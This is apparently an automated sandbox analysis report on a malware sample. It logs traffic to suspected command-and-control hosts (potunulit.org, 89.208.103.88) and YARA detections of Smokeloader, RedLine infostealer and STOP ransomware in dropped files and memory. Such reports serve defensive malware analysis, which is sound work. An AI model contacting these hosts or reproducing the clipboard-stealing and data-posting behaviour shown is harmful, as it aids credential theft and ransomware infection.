              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:42:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qY9%2FI3jpzeuGFKJaFwzV5psKw8btlS0SGqr4NYkOKq1edM0UiMLrYLvaeiMjBPp3W6jCOs9hKt4afkkUofOC5HjpfaE%2FXALilnPq8xxA9ZRyD3JqaXy5L8jpAmlz2piT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efb7b719d4bb86-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:42:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PQuhwW0%2BmVY2EEk%2BQmM%2FxVelthb435gJ75OTOr0K1zug7H5lyLscuCk2NVTTME96zcleUebNBlQsSJAsbuoOJld7ntlv827vD2%2FehCrFf3tj4loCejuLfl8wPad9V8hL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efb7b7aae3bb86-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Jan 2023 08:42:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nPv9BcavJsFprqWZHujU1OgCjNlR1icmk90cxEuOxnIvkFQwA%2FYH3t5UsuDskd70sxSHO9IJHlyo5B7xNrvOSS1%2BOv9VAkzVN0zq0d2mo5igjBI8JCK09PzU6o94TTDA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 78efb7b84bc6bb86-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownTCP traffic detected without corresponding DNS query: 89.208.103.88
              Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dipcj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: potunulit.org
              Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49730 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: Yara matchFile source: 0000000D.00000002.403573170.0000000004921000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.291031913.0000000004931000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.402735340.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.290704860.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 19.3.fontview.exe.55a0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.3.fontview.exe.55a0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.3.rundll32.exe.2275d6f0000.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000013.00000003.386704960.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000003.480168588.000002275D6F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000003.535647654.0000019D88EF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000003.387503810.00000000055A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000003.478098878.000002275D46D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: fontview.exe PID: 4020, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_00402830 Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_00402830 Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,
              Source: 2560.exe, 0000000F.00000002.362461879.0000000002F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
              Source: fontview.exe, 00000013.00000003.400623587.000000000564B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: NtUserGetRawInputData

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: Yara matchFile source: 17.2.2560.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.2560.exe.4a015a0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.2560.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.2560.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 2560.exe PID: 2136, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 2560.exe PID: 3152, type: MEMORYSTR

              System Summary

              barindex
              Source: 16.3.226F.exe.d030000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 18.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 17.2.2560.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 17.2.2560.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 16.3.226F.exe.d030000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 16.3.226F.exe.d030000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 15.2.2560.exe.4a015a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 15.2.2560.exe.4a015a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 16.2.226F.exe.16f3fc0.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 16.2.226F.exe.16f3fc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 16.3.226F.exe.16f3fc0.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 16.3.226F.exe.16f3fc0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 15.2.2560.exe.4a015a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 15.2.2560.exe.4a015a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 17.2.2560.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 17.2.2560.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 0000000D.00000002.402603602.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
              Source: 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 0000000D.00000002.403573170.0000000004921000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000000.00000002.291031913.0000000004931000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000010.00000003.367401202.000000000D030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0000000F.00000002.361737434.0000000002EA1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 0000000E.00000002.577154071.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
              Source: 0000000D.00000002.402735340.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000000.00000002.290704860.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 0000000D.00000002.403103692.0000000002C80000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 00000000.00000002.290595055.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
              Source: 00000000.00000002.290961017.0000000002C60000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 0000000E.00000002.577358269.0000000000678000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: Process Memory Space: 2560.exe PID: 2136, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: Process Memory Space: 2560.exe PID: 3152, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5980 -s 648
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_0040906E
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_004170F5
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_0041449A
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_00415940
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_0040D92B
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_00413A12
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_00413F56
              Source: C:\Users\user\Desktop\aw9Ynwqd1x.exeCode function: 0_2_0040C72C
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_0040906E
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_004170F5
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_0041449A
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_00415940
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_0040D92B
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_00413A12
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_00413F56
              Source: C:\Users\user\AppData\Roaming\dbjigstCode function: 13_2_0040C72C
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_004041D0
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_00411470
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_004010E0
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_00406150
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_004021D0
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_0042429D
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_0042C5FE
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_0040D600
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_004266B9
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_00402830
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_0040C9A0
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_00419A6E
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_0041CAF0
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_00409B10
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_0042AB9A
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_0040CC40
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_00401D90
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_0040CE90
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_00421F48
              Source: C:\Windows\explorer.exeSection loaded: webio.dll
              Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dll
              Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: rtutils.dll
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\226F.exe 768E12A9AF62F5F83F6D6FF64C6C10E37834FC202E0E4D609C80CE7FACC8C534
              Source: aw9Ynwqd1x.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 16.3.226F.exe.d030000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 18.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 17.2.2560.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
              Source: 17.2.2560.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 17.2.2560.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 16.3.226F.exe.d030000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 16.3.226F.exe.d030000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 15.2.2560.exe.4a015a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
              Source: 15.2.2560.exe.4a015a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 15.2.2560.exe.4a015a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 16.2.226F.exe.16f3fc0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 16.2.226F.exe.16f3fc0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
